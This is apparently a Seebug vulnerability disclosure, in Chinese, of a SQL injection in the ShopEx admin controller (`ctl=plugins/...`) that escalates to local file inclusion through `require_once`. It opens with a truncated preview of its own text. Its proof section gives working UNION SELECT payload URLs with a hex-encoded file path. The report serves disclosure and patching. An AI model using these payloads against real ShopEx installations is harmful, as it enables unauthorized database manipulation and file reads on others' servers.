### 简要描述: sql注入,无连载 ### 详细说明: shopex后台登陆地址: http://127.0.0.1/shopadmin/index.php?ctl=passport&act=login 分析代码: \core\include_v5\adminCore.php ``` public function adminCore( ) ...... $mod = $_GET['ctl'] ? $_GET['ctl'] : "default"; ...... $controller =& $this->getController( $mod ); ``` $mod就是我们提交的变量ctl 在下面找到函数getController: ``` public function &getController( $mod, $args = null ) { if ( !class_exists( "pageFactory" ) ) { require( "pageFactory.php" ); } $baseName = basename( $mod, $args ); $dirName = dirname( $mod ); if ( $dirName == "plugins" ) { $addon =& $this->loadModel( "system/addons" ); $object =& $addon->load( $baseName, "admin" ); $object->db =& $this->database( ); } else { $fname = CORE_DIR."/admin/controller/".$dirName."/ctl.".$baseName.".php"; ``` 关键逻辑: if ( $dirName == "plugins" ) $addon =& $this->loadModel( "system/addons" ); $object =& $addon->load( $baseName, "admin" ); 在文件\core\model_v5\system\mdl.addons.php中: ``` public function &load( $name, $type ) { if ( ( $type...
### 简要描述: sql注入,无连载 ### 详细说明: shopex后台登陆地址: http://127.0.0.1/shopadmin/index.php?ctl=passport&act=login 分析代码: \core\include_v5\adminCore.php ``` public function adminCore( ) ...... $mod = $_GET['ctl'] ? $_GET['ctl'] : "default"; ...... $controller =& $this->getController( $mod ); ``` $mod就是我们提交的变量ctl 在下面找到函数getController: ``` public function &getController( $mod, $args = null ) { if ( !class_exists( "pageFactory" ) ) { require( "pageFactory.php" ); } $baseName = basename( $mod, $args ); $dirName = dirname( $mod ); if ( $dirName == "plugins" ) { $addon =& $this->loadModel( "system/addons" ); $object =& $addon->load( $baseName, "admin" ); $object->db =& $this->database( ); } else { $fname = CORE_DIR."/admin/controller/".$dirName."/ctl.".$baseName.".php"; ``` 关键逻辑: if ( $dirName == "plugins" ) $addon =& $this->loadModel( "system/addons" ); $object =& $addon->load( $baseName, "admin" ); 在文件\core\model_v5\system\mdl.addons.php中: ``` public function &load( $name, $type ) { if ( ( $type == "app" || $type == "shop" || $type == "admin" ) && !class_exists( "app" ) ) { require( "app.php" ); } $data = $this->db->selectrow( "SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='{$type}' AND plugin_ident='{$name}'" ); return $this->plugin_instance( $data ); } ``` 最终我们提交的变量ctl变成变量:$name,而且shopex已经对变量做过反转义了。这里可以形成sql注入漏洞,继续看plugin_instance( $data ) ``` public function plugin_instance( $data ) { $sturct = unserialize( $data['plugin_struct'] ); $classname = $sturct['class_name']; if ( !$classname ) { return false; } if ( $data['plugin_base'] == 0 ) { if ( file_exists( PLUGIN_DIR.$data['plugin_path'] ) ) { require_once( PLUGIN_DIR.$data['plugin_path'] ); ``` require_once( PLUGIN_DIR.$data['plugin_path'] );,因为存在sql注入漏洞,所以所有的变量$data我们都是可以控制的。 ### 漏洞证明: http://127.0.0.1/shopadmin/index.php?ctl=plugins/pp.php%27 [<img src="https://images.seebug.org/upload/201306/2523352387b7c851b71a6a243c9586c8c8abc049.jpg" alt="shopex_1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/2523352387b7c851b71a6a243c9586c8c8abc049.jpg) 本地文件包含./../readme.txt http://127.0.0.1/shopadmin/index.php?ctl=plugins/pp.php%27%20and%201=2%20union%20select%20plugin_id,0x2E2F2E2E2F726561646D652E747874%20as%20plugin_path,%27s:5:%22funcs%22;a:9:{s:13:%22action_member%22;s:13:%22action_member%22;s:7:%22actions%22;s:7:%22actions%22;s:8:%22changelv%22;s:8:%22changelv%22;s:8:%22addpoint%22;s:8:%22addpoint%22;s:8:%22delpoint%22;s:8:%22delpoint%22;s:10:%22addadvance%22;s:10:%22addadvance%22;s:10:%22deladvance%22;s:10:%22deladvance%22;s:10:%22sendcoupon%22;s:10:%22sendcoupon%22;s:6:%22settag%22;s:6:%22settag%22;}}%27%20as%20plugin_struct,plugin_config,0%20as%20plugin_base%20FROM%20sdb_plugins%20limit%201%23 [<img src="https://images.seebug.org/upload/201306/252337283e38b765e982b34f3a6e0106f879a31b.jpg" alt="shopex_2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/252337283e38b765e982b34f3a6e0106f879a31b.jpg)
